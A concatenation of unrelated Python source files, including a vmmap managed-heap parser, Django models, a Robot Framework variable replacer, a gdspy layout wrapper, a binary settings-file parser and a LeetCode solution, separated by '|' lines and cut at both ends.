        os.remove(vmmap_csv)
        print '[+] Done!'
    else:
        print '[!] {} not a file.'.format(vmmap)
# end-of-function run_vmmap
def parse_vmmap_file(vmmap_csv):
    """
    Use a vmmap CSV report to find all managed heaps and fill the global
    MANAGED_HEAPS list with (start_address, stop_address, details) tuples.

    Arguments:
    vmmap_csv -- Full path to vmmap output CSV file.

    Returns: None.
    """
    global MANAGED_HEAPS

    with open(vmmap_csv, 'r') as fh:
        for l in fh.readlines():
            # Keep only committed "Managed Heap" rows: indented quoted lines
            # that are not marked Reserved.
            if 'Managed Heap' in l and l.startswith('" ') and 'Reserved' not in l and len(l) > 0:
                # Clean up line: drop non-breaking spaces and quoting.
                l = l.replace('\xa0', '')
                l = l.replace('"', '').strip()
                tokens = l.split(',')

                # Column 0 is the hex start address, column 2 the region size.
                start = int(tokens[0].replace('"', ''), 16)
                size = tokens[2].replace('"', '')
                if 'bytes' in size:
                    size = int(size.replace(' bytes', ''))  # vmmap sometimes emits a human-readable "N bytes" form
                else:
                    size = int(size) * 1024  # Size in KB

                # Update list with tuple (start_address, stop_address, details)
                MANAGED_HEAPS.append( (start, start + size, tokens[-1]) )
# end-of-function managed_heaps
def clr_import(module_name):
    """Add reference to a managed (.NET) module and import it.

    Registers the assembly with the CLR first so that the subsequent
    Python-level import can resolve it.

    Arguments:
    module_name -- Managed module name.

    Returns: None.
    """
    clr.AddReference(module_name)
    # imp.find_module + load_module performs the actual Python import.
    imp.load_module(module_name, *imp.find_module(module_name))
# end-of-function clr_import
if __name__ == '__main__':
pass |
class Ultimo(object):
    """Info about the latest available programs.

    Attributes mirror the JSON payload this is built from: url, tapa (cover),
    nombre, nombre_programa, fecha, id, id_programa.
    """

    def __init__(self, url, tapa, nombre, nombre_programa, fecha, id, id_programa):
        self.url = url
        self.tapa = tapa
        self.nombre = nombre
        self.nombre_programa = nombre_programa
        self.fecha = fecha
        self.id = id
        self.id_programa = id_programa

    def str(self):
        """Return a short human-readable label, e.g. "(42)Some show"."""
        return "({}){}".format(self.id, self.nombre)

    # Bug fix: wire the label into the data model so str(obj) / print(obj)
    # show it too; the original .str() method is kept for existing callers.
    def __str__(self):
        return self.str()

    # Bug fix: this was an instance method whose dict argument occupied the
    # `self` slot, so calling it on an instance passed the instance as `dct`.
    # As a @staticmethod it works both as Ultimo.from_json(d) and obj.from_json(d).
    @staticmethod
    def from_json(dct):
        """Build an Ultimo from a JSON-decoded dict with the expected keys."""
        return Ultimo(dct['url'], dct['tapa'], dct['nombre'], dct['nombre_programa'],
                      dct['fecha'], dct['id'], dct['id_programa'])
import re
from enum import Enum
from typing import Dict
import libkol
from .request import Request
class QuestPage(Enum):
    """Tabs of the in-game quest log; values map to the `which` URL parameter."""
    Current = 1
    Completed = 2
    Accomplishments = 3
    Notes = 4
    HoboCode = 5
    MonsterManuel = 6
# Matches "<b>Quest Title</b><br>description<p>" entries in the quest log
# HTML; the negative lookahead skips bold text immediately followed by
# </td> (table headers rather than quest entries).
quests_completed_pattern = re.compile(
    r"<b>([\w\s,\.\'\?!]+)<\/b>(?!<\/td>)<br>([\w\s,\.\'\?!]+)<p>"
)
class questlog(Request):
    """
    Get info from the quest log about which quests are completed and which
    stage of each uncompleted quest the player is on.

    :param page: Page of the quest log to request
    """

    def __init__(
        self, session: "libkol.Session", page: QuestPage = QuestPage.Current
    ) -> None:
        # The quest log selects its tab via the `which` query parameter.
        params = {"which": page.value}
        self.request = session.request("questlog.php", params=params)

    @staticmethod
    async def parser(content: str, **kwargs) -> Dict[str, str]:
        # Map quest title -> description text for every entry the
        # completed-quests pattern finds in the page HTML.
        return {
            match.group(1): match.group(2)
            for match in quests_completed_pattern.finditer(content)
        }
|
# Import third-party modules
from vendor.Qt import QtWidgets
# Import local modules
import scriptsmenu
def _mari_main_window():
    """Get Mari main window.

    Returns:
        MriMainWindow: Mari's main window.

    Raises:
        RuntimeError: If no top-level widget is Mari's main window.
    """
    for widget in QtWidgets.QApplication.topLevelWidgets():
        class_name = widget.metaObject().className()
        if class_name == 'MriMainWindow':
            return widget
    raise RuntimeError('Could not find Mari MainWindow instance')
def _mari_main_menubar():
    """Get Mari main menu bar.

    Returns:
        QtWidgets.QMenuBar: The main menubar of the Mari window.
    """
    window = _mari_main_window()
    menubars = [
        child for child in window.children()
        if isinstance(child, QtWidgets.QMenuBar)
    ]
    # Exactly one menubar is expected on the main window.
    assert len(menubars) == 1, "Error, could not find menu bar!"
    return menubars[0]
def main(title="Scripts"):
    """Build the main scripts menu in Mari.

    Args:
        title (str): Name of the menu in the application.

    Returns:
        scriptsmenu.ScriptsMenu: The existing menu with that title when one
        is already installed, otherwise a freshly created instance parented
        to Mari's menubar.
    """
    main_bar = _mari_main_menubar()

    # Reuse an already-installed scripts menu with the same title, if any.
    for child in main_bar.children():
        if isinstance(child, scriptsmenu.ScriptsMenu) and child.title() == title:
            return child

    return scriptsmenu.ScriptsMenu(title=title, parent=main_bar)
|
import copy
import gdspy
import numpy as np
from operator import add, sub
from recordclass import recordclass
import gds_tools as gtools
class GDStructure:
    """Wrapper around a gdspy shape that tracks named endpoints and the
    structures connected to them, so that rotate/translate/mirror operations
    propagate through everything that is linked together."""

    def __init__(self, structure, endpoints, endpoint_dims, endpoint_directions = None, method = None, args = {}):
        """Define class to store structures in

        Args:
            structure (gdspy.Path()): gdspy description of object (i.e. ouput of gdspy.PolyPath()).
            endpoints (dict): positions of the endpoints to which you connect other structures.
            endpoint_dims (dict): dimensions of the endpoints (width/height/etc.), to be used for connecting e.g. transmission lines.
            endpoint_directions (dict, optional): endpoint name -> direction in radians. Defaults to None.
            method (callable, optional): generator function used by .generate(). Defaults to None.
            args (dict, optional): keyword arguments for `method`. Defaults to {}.
        """
        self.type = 'GDStructure'
        self.structure = structure
        self.endpoints = endpoints
        self.endpoint_dims = endpoint_dims
        self.endpoint_directions = endpoint_directions
        # Sub-structures that belong to this one (e.g. healers added later).
        self.compound = []
        # Linked-list style maps of connected structures, keyed by endpoint.
        self.prev = {}
        self.next = {}
        self.method = method
        # Store generator args in a mutable named-tuple-like record.
        self.__args_tuple__ = recordclass('args', args.keys())
        self.args = self.__args_tuple__(**args)
        self.gen = self.generate

    def generate(self):
        """Re-run the stored generator `method` with the stored `args`."""
        if self.method != None:
            return self.method(**self.args.__dict__)
        else:
            raise TypeError('This GDStructure does not support the .generate() method (yet)')

    def copy(self):
        """Makes a new copy of the structure,
        i.e. allocates new memory and copies the data contents to it.

        Returns:
            gds_tools.GDStructure: pointer of copy of original
        """
        # Create deepcopy of self and return the copy
        # Do not copy.deepcopy(self) directly, as this will also copy the connections and screw things up
        # Instead, just fill a new instance of the class with copies of relevant internal structure
        new_obj = gtools.classes.GDStructure(copy.deepcopy(self.structure), copy.deepcopy(self.endpoints), copy.deepcopy(self.endpoint_dims), copy.deepcopy(self.endpoint_directions))

        # Copy compound members too; note the copy's `next` is keyed by the
        # compound index here (not by endpoint name as elsewhere).
        compound = []
        for i, c in enumerate(self.compound):
            c_copy = c.copy()
            compound.append(c_copy)
            new_obj.next[i] = c_copy
        new_obj.compound = compound

        return new_obj

    #==================
    # Rotate structure \\
    #=========================================================================
    # When rotating, all endpoints need to move wih the rotation,            ||
    # for this reason we need our own rotation function.                     ||
    #                                                                        ||
    # Arguments:    rad         : amount of radians to rotate                ||
    #               signal_from : tells linked structure who sent command    ||
    #=========================================================================
    def rotate(self, rad, signal_from = None):
        """Rotate this structure and everything connected to it by `rad`
        radians; `signal_from` accumulates already-visited structures so the
        propagation through the linked graph terminates."""
        if not isinstance(signal_from, list):
            signal_from = [signal_from]

        # Rotate the structure with standard gdspy .rotation() function
        if self not in signal_from:
            signal_from.append(self)
            self.structure.rotate(rad)

            # Rotate the endpoints
            for i in self.endpoints:
                self.endpoints[i] = tuple(gtools.funcs.VecRot(rad, self.endpoints[i]))
                if self.endpoint_directions:
                    self.endpoint_directions[i] += rad

            # Rotate all connected structures
            for i in self.prev:
                if self.prev[i] not in signal_from and self.prev:
                    signal_from.append(self.prev[i])
                    self.prev[i].rotate(rad, signal_from = signal_from)
            for i in self.next:
                if self.next[i] not in signal_from and self.next:
                    signal_from.append(self.next[i])
                    self.next[i].rotate(rad, signal_from = signal_from)

        return self

    #=====================
    # Get structure layer \\
    #=========================================================================
    # Gdspy has some inconsistencies in how it stores layers, this getter    ||
    # function should make life easier to obtain the layer of the object     ||
    # stored in self.structure                                               ||
    #=========================================================================
    def getlayer(self):
        """Return the layer of the wrapped gdspy object (0 if none found)."""
        return self.structure.layers[0] if hasattr(self.structure, 'layers') else (self.structure.layer if hasattr(self.structure, 'layer') else 0)

    #=====================
    # Translate structure \\
    #=========================================================================
    # Arguments:    delta       : vector (x, y) how much you want to move    ||
    #               signal_from : tells linked structure who sent command    ||
    #=========================================================================
    def translate(self, delta, signal_from = None):
        """Translate this structure and all connected structures by the
        (x, y) vector `delta`."""
        if not isinstance(signal_from, list):
            signal_from = [signal_from]

        # Translate structure with standard gdspy .translate() function
        if self not in signal_from:
            signal_from.append(self)
            self.structure.translate(delta[0], delta[1])

            # Translate all the endpoints
            for i in self.endpoints:
                self.endpoints[i] = tuple(map(add, self.endpoints[i], delta))

            # Translate all connected structures
            for i in self.prev:
                if self.prev[i] not in signal_from and self.prev:
                    signal_from.append(self.prev[i])
                    self.prev[i].translate(delta, signal_from = signal_from)
            for i in self.next:
                if self.next[i] not in signal_from and self.next:
                    signal_from.append(self.next[i])
                    self.next[i].translate(delta, signal_from = signal_from)

        return self

    #=====================
    # Mirror structure    \\
    #=========================================================================
    # Arguments:    p1, p2      : p1 and p2 are (x, y) coords forming        ||
    #                             the mirror line                            ||
    #=========================================================================
    def mirror(self, p1, p2, signal_from = None):
        """Mirror this structure and all connected structures across the
        line through p1 and p2."""
        if not isinstance(signal_from, list):
            signal_from = [signal_from]

        # Mirror the gdspy shape
        if self not in signal_from:
            signal_from.append(self)
            self.structure.mirror(p1, p2 = p2)

            # Process the endpoints
            for k, v in self.endpoints.items():
                p1 = list(p1)
                p2 = list(p2)

                # Nudge degenerate (vertical/horizontal) lines so the slope
                # below is always defined.
                if p1[0] == p2[0]:
                    p1[0] += 1E-20
                if p1[1] == p2[1]:
                    p1[1] += 1E-20

                # y = ax + c : mirror line
                a = (p2[1] - p1[1]) / (p2[0] - p1[0])
                c = p1[1] - a * p1[0]

                # Reflect endpoint v across the line y = ax + c.
                d = (v[0] + (v[1] - c)*a) / (1 + a**2)
                v2x = 2*d - v[0]
                v2y = 2*d*a - v[1] + 2*c

                self.endpoints[k] = (v2x, v2y)

            # Ripple through all connected shapes
            for i in self.prev:
                if self.prev[i] not in signal_from and self.prev:
                    signal_from.append(self.prev[i])
                    self.prev[i].mirror(p1, p2, signal_from = signal_from)
            for i in self.next:
                if self.next[i] not in signal_from and self.next:
                    signal_from.append(self.next[i])
                    self.next[i].mirror(p1, p2, signal_from = signal_from)

        return self

    #=================
    # Heal connection \\
    #=========================================================================
    # When connection endpoints, there is always a little space that is not  ||
    # overlapped. This function will fill this overlap.                      ||
    #                                                                        ||
    # Arguments:    endpoint    : (x, y) center of healer                    ||
    #    (optional) npoints     : number of points to use for boundary       ||
    #=========================================================================
    def heal(self, endpoint, npoints = 100, r = 'auto', layer = None, datatype = None):
        """Place a filler circle at `endpoint`; r='auto' uses half the stored
        endpoint dimension as the radius."""
        if type(r) == str and r == 'auto':
            r = self.endpoint_dims[endpoint] / 2

        healer = gtools.heal.circle(r, self.endpoints[endpoint], npoints = npoints, layer = layer if layer != None else self.getlayer(), datatype = datatype if datatype != None else self.structure.datatypes[0])
        self.prev['HEAL_' + endpoint] = healer
        self.compound += [healer]

        return self

    #===================
    # Connect structure \\
    #=========================================================================
    # Arguments:    ep_self : reference to A, B, C, etc.                     ||
    #                         name of endpoint of this structure             ||
    #               to      : GDStructure class input to which to connect    ||
    #               ep_to   : endpoint to which to connect to                ||
    #               offset  : (x, y) offset from target endpoints            ||
    #               obj_link: use Python object reference for linked list    ||
    #                         entry rather than endpoint key                 ||
    #=========================================================================
    def connect(self, ep_self, to, ep_to, offset = (0, 0), obj_link = False, rotate = True):
        """Snap this structure's endpoint `ep_self` onto `to`'s endpoint
        `ep_to`, optionally auto-rotating so the endpoint directions face
        each other, and record the link in both structures."""
        # Rotate to correct orientation
        if self.endpoint_directions != None and to.endpoint_directions != None and self.endpoint_directions and to.endpoint_directions and rotate:
            self.rotate((to.endpoint_directions[ep_to] - self.endpoint_directions[ep_self] - np.pi) % (2 * np.pi))

        # Move to connect endpoints
        delta = tuple(map(sub, to.endpoints[ep_to], self.endpoints[ep_self]))
        delta = tuple(map(add, delta, offset))
        self.mov(delta)

        # Update linked list
        if not obj_link:
            to.next[ep_to] = self
            self.prev[ep_self] = to
        else:
            to.next[self] = self
            self.prev[to] = to

        return self

    #======================
    # Disconnect structure \\
    #=========================================================================
    # Only removes the references in the linked lists                        ||
    #=========================================================================
    def disconnect(self):
        """Remove every prev/next reference between this structure and its
        neighbours (geometry is left untouched)."""
        for e in self.endpoints:
            if e in self.next:
                for ne in self.next[e].endpoints:
                    if ne in self.next[e].prev and self.next[e].prev[ne] == self:
                        del self.next[e].prev[ne]
                del self.next[e]
            if e in self.prev:
                for pe in self.prev[e].endpoints:
                    if pe in self.prev[e].next and self.prev[e].next[pe] == self:
                        del self.prev[e].next[pe]
                del self.prev[e]

        return self

    # Aliases
    rot = rotate
    mov = translate
    con = connect
    dis = disconnect
|
# AUTOGENERATED BY NBDEV! DO NOT EDIT!
# Maps exported names to the notebook that defines them; nbdev regenerates
# this file, so fix issues in the source notebooks, not here.

__all__ = ["index", "modules", "custom_doc_links", "git_url"]

# Exported symbol -> source notebook.
index = {"Preprocess": "00_preprocess.ipynb",
         "get_freq": "01_tfidf.ipynb",
         "form_matrix": "01_tfidf.ipynb",
         "get_query_vec": "01_tfidf.ipynb",
         "get_cos_sim": "01_tfidf.ipynb"}

# Library modules generated from the notebooks.
# NOTE(review): "None.py" looks like a notebook missing its `# default_exp`
# directive -- confirm in the source notebooks.
modules = ["preprocess.py",
           "tfidf.py",
           "None.py"]

doc_url = "https://Sylvia9628.github.io/nbdev_testing/"

git_url = "https://github.com/Sylvia9628/nbdev_testing/tree/master/"

# No custom documentation links are defined for this project.
def custom_doc_links(name): return None
|
from django.db import models
class RawDialog(models.Model):
    """A dialog line as originally collected, before any censoring."""
    id = models.AutoField(primary_key=True)
    # The raw dialog text (up to 500 chars, required).
    content_text = models.CharField(blank=False, null=False, max_length=500)
    # Creation/modification timestamps maintained automatically by Django.
    create_date = models.DateTimeField(auto_now_add=True)
    update_date = models.DateTimeField(auto_now=True)

    class Meta:
        db_table = 'raw_dialogs'
class CensoredDialog(models.Model):
    """A censored variant of a RawDialog; deleted together with its source row."""
    id = models.AutoField(primary_key=True)
    # Source dialog; CASCADE removes censored rows when the raw row goes.
    raw_dialog = models.ForeignKey(RawDialog, db_column='raw_dialog_id', on_delete=models.CASCADE, null=False, related_name='censored_dialogs')
    # The censored dialog text (up to 500 chars, required).
    content_text = models.CharField(blank=False, null=False, max_length=500)
    # Creation/modification timestamps maintained automatically by Django.
    create_date = models.DateTimeField(auto_now_add=True)
    update_date = models.DateTimeField(auto_now=True)

    class Meta:
        db_table = 'censored_dialogs'
|
# Copyright 2008-2015 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from robotide.lib.robot.errors import DataError, VariableError
from robotide.lib.robot.output import LOGGER
from robotide.lib.robot.utils import escape, unescape, unic, is_string
from .splitter import VariableSplitter
class VariableReplacer(object):
    """Resolves Robot Framework variable syntax (${scalar}, @{list}, &{dict},
    indexed items, and variables embedded in strings) against a variable
    store supplied at construction time."""

    def __init__(self, variables):
        # `variables` is a mapping-like store queried as self._variables[name].
        self._variables = variables

    def replace_list(self, items, replace_until=None):
        """Replaces variables from a list of items.

        If an item in a list is a @{list} variable its value is returned.
        Possible variables from other items are replaced using 'replace_scalar'.
        Result is always a list.

        'replace_until' can be used to limit replacing arguments to certain
        index from the beginning. Used with Run Keyword variants that only
        want to resolve some of the arguments in the beginning and pass others
        to called keywords unmodified.
        """
        items = list(items or [])
        if replace_until is not None:
            return self._replace_list_until(items, replace_until)
        return list(self._replace_list(items))

    def _replace_list_until(self, items, replace_until):
        # @{list} variables can contain more or less arguments than needed.
        # Therefore we need to go through items one by one, and escape possible
        # extra items we got.
        replaced = []
        while len(replaced) < replace_until and items:
            replaced.extend(self._replace_list([items.pop(0)]))
        if len(replaced) > replace_until:
            replaced[replace_until:] = [escape(item)
                                        for item in replaced[replace_until:]]
        return replaced + items

    def _replace_list(self, items):
        # Generator: list variables are flattened into the output, everything
        # else yields a single replaced value.
        for item in items:
            if self._cannot_have_variables(item):
                yield unescape(item)
            else:
                splitter = VariableSplitter(item)
                value = self._replace_scalar(item, splitter)
                if splitter.is_list_variable():
                    for v in value:
                        yield v
                else:
                    yield value

    def replace_scalar(self, item):
        """Replaces variables from a scalar item.

        If the item is not a string it is returned as is. If it is a ${scalar}
        variable its value is returned. Otherwise variables are replaced with
        'replace_string'. Result may be any object.
        """
        if self._cannot_have_variables(item):
            return unescape(item)
        return self._replace_scalar(item)

    def _replace_scalar(self, item, splitter=None):
        # A lone ${var} returns the stored object itself; variables embedded
        # in longer text fall through to string replacement.
        if not splitter:
            splitter = VariableSplitter(item)
        if not splitter.identifier:
            return unescape(item)
        if splitter.is_variable():
            return self._get_variable(splitter)
        return self._replace_string(item, splitter)

    def _cannot_have_variables(self, item):
        # Cheap pre-check: only strings containing '{' can hold variables.
        return not (is_string(item) and '{' in item)

    def replace_string(self, string, ignore_errors=False):
        """Replaces variables from a string. Result is always a string."""
        if not is_string(string):
            return unic(string)
        if self._cannot_have_variables(string):
            return unescape(string)
        return self._replace_string(string, ignore_errors=ignore_errors)

    def _replace_string(self, string, splitter=None, ignore_errors=False):
        if not splitter:
            splitter = VariableSplitter(string)
        return ''.join(self._yield_replaced(string, splitter, ignore_errors))

    def _yield_replaced(self, string, splitter, ignore_errors=False):
        # Walk the string variable-by-variable: emit the literal prefix, the
        # resolved value, then re-split the remainder until no variable is left.
        while splitter.identifier:
            yield unescape(string[:splitter.start])
            try:
                value = self._get_variable(splitter)
            except DataError:
                if not ignore_errors:
                    raise
                # On ignored errors keep the original ${...} text verbatim.
                value = string[splitter.start:splitter.end]
            yield unic(value)
            string = string[splitter.end:]
            splitter = VariableSplitter(string)
        yield unescape(string)

    def _get_variable(self, splitter):
        # Dispatch on identifier ($, @, &, %) and on plain vs. indexed access.
        if splitter.identifier not in '$@&%':
            return self._get_reserved_variable(splitter)
        if splitter.index is None:
            return self._get_normal_variable(splitter)
        if splitter.identifier == '@':
            return self._get_list_variable_item(splitter)
        return self._get_dict_variable_item(splitter)

    def _get_reserved_variable(self, splitter):
        # Identifiers outside $@&% are reserved; warn and return them as text.
        value = splitter.get_replaced_variable(self)
        LOGGER.warn("Syntax '%s' is reserved for future use. Please "
                    "escape it like '\\%s'." % (value, value))
        return value

    def _get_normal_variable(self, splitter):
        name = splitter.get_replaced_variable(self)
        return self._variables[name]

    def _get_list_variable_item(self, splitter):
        # @{list}[index]: the index itself may contain variables and must be
        # an integer.
        name = splitter.get_replaced_variable(self)
        variable = self._variables[name]
        index = self.replace_string(splitter.index)
        try:
            index = int(index)
        except ValueError:
            raise VariableError("List variable '%s' used with invalid index '%s'."
                                % (name, index))
        try:
            return variable[index]
        except IndexError:
            raise VariableError("List variable '%s' has no item in index %d."
                                % (name, index))

    def _get_dict_variable_item(self, splitter):
        # &{dict}[key]: the key is resolved as a scalar, so it may be any
        # hashable object, not just a string.
        name = splitter.get_replaced_variable(self)
        variable = self._variables[name]
        key = self.replace_scalar(splitter.index)
        try:
            return variable[key]
        except KeyError:
            raise VariableError("Dictionary variable '%s' has no key '%s'."
                                % (name, key))
        except TypeError as err:
            raise VariableError("Dictionary variable '%s' used with invalid key: %s"
                                % (name, err))
|
from django.apps import AppConfig as DjangoAppConfig
class AppConfig(DjangoAppConfig):
    """Django application config for the unplugged admin service."""
    name = "unplugged.services.admin"
    verbose_name = "Admin Service"
    label = "services_admin"
    def ready(self):
        # Imported for its side effects only -- presumably AdminService
        # registers itself on import; confirm against .handler.
        from .handler import AdminService  # NOQA
|
import os,sys
import checker
import json
username = sys.argv[1]
# username = input()

# Look up the account for the given username and echo it as JSON.
account = checker.check(username)
json_string = json.dumps(account)
print(json_string)

# Switch into the result directory when it exists; otherwise stay put.
# BUGFIX: the bare `except:` also swallowed KeyboardInterrupt/SystemExit;
# only filesystem errors are expected here.
try:
    os.chdir(os.getcwd() + '/Python_Scripts/result/')
except OSError:
    pass

# Persist the result for downstream consumers.
with open("userpresent.json", "w") as f:
    json.dump(account, f)
|
import threading, wx, os, wx.lib.agw.aui as aui
from sciapp import Source
def parse(cont):
    """Parse workflow markup text into a nested dict.

    Line 1 is the workflow title; '## ' lines open chapters; numbered
    'N. ' lines open sections; any other line is treated as the hint of
    the current section and attaches that section to the current chapter.
    """
    lines = cont.split('\n')
    workflow = {'title': lines[0], 'chapter': []}
    for raw in lines[2:]:
        text = raw.strip()
        if text.startswith('## '):
            chapter = {'title': text[3:], 'section': []}
            workflow['chapter'].append(chapter)
        elif text[1:3] == '. ':
            section = {'title': text[3:]}
        else:
            # NOTE(review): a section is only appended once a hint line
            # follows it, and every such line re-appends -- confirm the
            # markup guarantees exactly one hint per section.
            section['hint'] = text
            chapter['section'].append(section)
    return workflow
class WorkFlow:
    """Holds workflow markup (raw and parsed) and shows it in an AUI pane."""
    def __init__(self, title, cont):
        self.title = title
        self.workflow = parse(cont)  # parsed structure (see parse above)
        self.cont = cont             # raw markup text
    def __call__(self):
        # Calling the instance returns itself (factory-style registration).
        return self
    def start(self, para=None, callafter=None):
        # NOTE(review): WorkFlowPanel and IPy are not imported in this
        # module view -- presumably injected by the host app; confirm.
        pan = WorkFlowPanel(IPy.curapp)
        pan.load(self.cont, self.workflow)
        # Dockable pane configuration; docking side depends on UI mode.
        info = aui.AuiPaneInfo(). DestroyOnClose(True). Left(). Caption(self.title) .PinButton( True ) \
            .Resizable().FloatingSize( wx.DefaultSize ).Dockable(IPy.uimode()=='ipy').Layer( 5 )
        if IPy.uimode()=='ipy': info.Dock().Top()
        if IPy.uimode()=='ij': info.Float()
        IPy.curapp.auimgr.AddPane(pan, info)
        IPy.curapp.Layout()
        IPy.curapp.auimgr.Update()
def show_wf(data, title):
    """Schedule a WorkFlow pane for *data* on the wx main thread."""
    flow = WorkFlow(title, data)
    wx.CallAfter(flow.start)
# ViewerManager.add('wf', show_wf)
def read_wf(path):
    """Read a workflow file as UTF-8 text, echo it, and return the content.

    BUGFIX: the file handle was left open when read() raised; a context
    manager guarantees it is closed on every path.
    """
    with open(path, encoding='utf-8') as f:
        cont = f.read()
    print(cont)
    return cont
Source.manager('reader').add(name='wf', obj=read_wf, tag='wf') |
#!/usr/bin/env python3
from __future__ import print_function
import os
import struct
import sys
import collections
# Config entry type tags used in the settings file's binary format.
CFG_TYPE_STR = 0x01  # NUL-terminated UTF-8 string
CFG_TYPE_U8 = 0x02  # single unsigned byte
CFG_TYPE_U32 = 0x03  # little-endian unsigned 32-bit integer
def eprint(*args, **kwargs):
    """Print to standard error; accepts the same arguments as print()."""
    print(*args, file=sys.stderr, **kwargs)
def printStringSetting(name, value):
    """Print a string-typed config entry, stripping NUL terminators."""
    decoded = value.decode('utf-8').strip('\x00')
    print('%s = str!"%s"' % (name, decoded))
def printU8Setting(name, value):
    """Print a u8-typed config entry as upper-case hex."""
    first_byte = value[0]
    print('%s = u8!0x%X' % (name, first_byte))
def printU32Setting(name, value):
    """Print a u32-typed config entry (little-endian) as upper-case hex."""
    (number,) = struct.unpack('<I', value)
    print('%s = u32!0x%X' % (name, number))
def parseSystemSettings(path, size):
    """Parse a binary system settings file and print its entries.

    path: path to the settings file.  size: its total size in bytes
    (already validated to be > 4 by the caller).

    Entries are grouped by owner and printed sorted by owner, then name.
    Improvements over the previous version: the bare `except` around
    open() is narrowed to OSError, the file handle is managed by `with`,
    and the locals no longer shadow the `type`/`file` builtins.
    """
    # Map entry type tag -> print helper for that type.
    cfg_type_dict = {
        CFG_TYPE_STR: printStringSetting,
        CFG_TYPE_U8: printU8Setting,
        CFG_TYPE_U32: printU32Setting
    }
    # Parsed entries: {owner: {name: (entry_offset, entry_type, value)}}.
    cfg = {}
    try:
        settings_file = open(path, "rb")
    except OSError:
        eprint('Failed to open file!')
        return
    error = False
    with settings_file:
        # Double check settings file size by reading the first four bytes.
        settings_size = struct.unpack('<I', settings_file.read(4))[0]
        if settings_size != size:
            eprint('File size in header doesn\'t match actual file size!')
            return
        offset = 4
        while offset < size:
            entry_offset = offset
            # Safety check: the 4-byte name size field must fit.
            if (offset + 4) > size:
                eprint('Invalid name size field length for config entry at offset 0x%X (0x%X byte[s] left).' % (entry_offset, size - offset))
                error = True
                break
            # Get name size.
            name_size = struct.unpack('<I', settings_file.read(4))[0]
            offset += 4
            # Safety check: name plus the 5-byte type/value-size header must fit.
            if (not name_size) or ((offset + name_size + 5) > size):
                eprint('Invalid name/type/value size field length for config entry at offset 0x%X (0x%X byte[s] left, 0x%X-byte long name).' % (entry_offset, size - offset, name_size))
                error = True
                break
            # The stored name includes a NULL terminator, so its stringified
            # length should be exactly one byte shorter than name_size.
            name = settings_file.read(name_size).decode('utf-8').strip('\x00')
            if len(name) != (name_size - 1):
                eprint('Invalid stringified name length for config entry at offset 0x%X.' % (entry_offset))
                error = True
                break
            offset += name_size
            # An exclamation mark divides the entry owner and the entry name.
            sep = name.find('!')
            if sep < 0:
                eprint('Name for config entry at offset 0x%X doesn\'t hold an owner.' % (entry_offset))
                error = True
                break
            owner = name[:sep]
            name = name[sep + 1:]
            # Entry type (u8) and value size (u32).
            (entry_type, value_size) = struct.unpack('<BI', settings_file.read(5))
            offset += 5
            # Safety check: the value must fit in the remaining bytes.
            if (offset + value_size) > size:
                eprint('Invalid value field length for config entry at offset 0x%X (0x%X byte[s] left, 0x%X-byte long value).' % (entry_offset, size - offset, value_size))
                error = True
                break
            value = settings_file.read(value_size)
            offset += value_size
            # Fixed-width types must have exactly matching value lengths.
            if ((entry_type == CFG_TYPE_U8) and (len(value) != 1)) or ((entry_type == CFG_TYPE_U32) and (len(value) != 4)):
                eprint('Value size doesn\'t match entry type for config entry at offset 0x%X.' % (entry_offset))
                error = True
                break
            # Record the entry under its owner (later duplicates overwrite).
            cfg.setdefault(owner, {})[name] = (entry_offset, entry_type, value)
    if error:
        return
    # Print entries sorted by owner, then by entry name.
    for owner in sorted(cfg):
        print('[%s]' % (owner))
        owner_cfg = cfg[owner]
        for name in sorted(owner_cfg):
            (entry_offset, entry_type, value) = owner_cfg[name]
            # Retrieve the proper print function for this entry type.
            print_func = cfg_type_dict.get(entry_type, None)
            if not print_func:
                eprint('Unknown config value type for entry at offset 0x%X (0x%02X).' % (entry_offset, entry_type))
                return
            print_func(name, value)
        print()
def main():
    """Entry point: validate the CLI path argument and parse the file."""
    if len(sys.argv) < 2:
        eprint('Provide a path to a system settings file!')
        return
    # Resolve ~ and environment variables before checking the path.
    path = os.path.abspath(os.path.expanduser(os.path.expandvars(sys.argv[1])))
    if not os.path.exists(path) or os.path.isdir(path):
        eprint('The provided path doesn\'t exist or points to a directory!')
        return
    # The size header alone takes four bytes, so anything smaller is invalid.
    size = os.path.getsize(path)
    if size <= 4:
        eprint('Invalid file size.')
        return
    parseSystemSettings(path, size)
if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        eprint('\nScript interrupted.')
    # sys.exit() raises SystemExit, which is caught right below, so the
    # process always terminates via os._exit(0) (skipping cleanup handlers).
    try:
        sys.exit(0)
    except SystemExit:
        os._exit(0)
|
#
# @lc app=leetcode id=821 lang=python3
#
# [821] Shortest Distance to a Character
#
# https://leetcode.com/problems/shortest-distance-to-a-character/description/
#
# algorithms
# Easy (64.71%)
# Likes: 844
# Dislikes: 69
# Total Accepted: 54.4K
# Total Submissions: 83K
# Testcase Example: '"loveleetcode"\n"e"'
#
# Given a string S and a character C, return an array of integers representing
# the shortest distance from the character C in the string.
#
# Example 1:
#
#
# Input: S = "loveleetcode", C = 'e'
# Output: [3, 2, 1, 0, 1, 0, 0, 1, 2, 2, 1, 0]
#
#
#
#
# Note:
#
#
# S string length is in [1, 10000].
# C is a single character, and guaranteed to be in string S.
# All letters in S and C are lowercase.
#
#
#
# @lc code=start
class Solution:
    def shortestToChar(self, S: str, C: str) -> 'List[int]':
        """Return, for each index of S, the distance to the nearest C.

        Two-pass O(n) sweep instead of the previous O(n*k) min over all
        occurrences: left-to-right records the distance to the previous C,
        right-to-left tightens it with the next C.  C is guaranteed to
        occur in S, so every position ends up finite.

        BUGFIX: the return annotation is quoted so the class also loads
        without `from typing import List` in scope (it previously raised
        NameError when the class body executed outside LeetCode's runner).
        """
        n = len(S)
        INF = float('inf')
        ans = [0] * n
        # Left-to-right: distance from the most recent C seen so far.
        prev = -INF
        for i, ch in enumerate(S):
            if ch == C:
                prev = i
            ans[i] = i - prev
        # Right-to-left: tighten with the nearest C on the right.
        prev = INF
        for i in range(n - 1, -1, -1):
            if S[i] == C:
                prev = i
            ans[i] = min(ans[i], prev - i)
        return ans
# @lc code=end
|
import argparse
import logging
from ccoin.p2p_network import BasePeer
# Verbose logging for the whole process; the module logger mirrors it.
